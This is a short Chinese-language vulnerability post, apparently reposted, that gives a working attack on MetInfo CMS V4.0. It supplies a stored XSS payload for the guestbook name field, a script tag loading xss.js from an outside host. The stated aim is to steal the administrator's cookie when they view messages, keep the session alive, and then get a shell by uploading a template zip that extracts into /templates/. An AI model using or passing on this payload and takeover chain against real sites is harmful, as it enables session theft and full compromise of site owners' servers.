发布作者:noevil 漏洞 类型:XSS跨站
利用方法:
在线留言处: 名字填写: Noevil<SCRIPT SRC="HTTP://www.2cto.com /xss.js"></SCRIPT>
内容:随意。
后台管理员查看留言列表,自动截取Cookie,NoXss会努力的去Keep Session登陆后台
拿Shell: 添加模板,上传Zip,Zip里的东西会自动解压到 /templates/目录里。
查看更多关于最新MetInfo企业网站管理系统 V4.0 XSS - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11566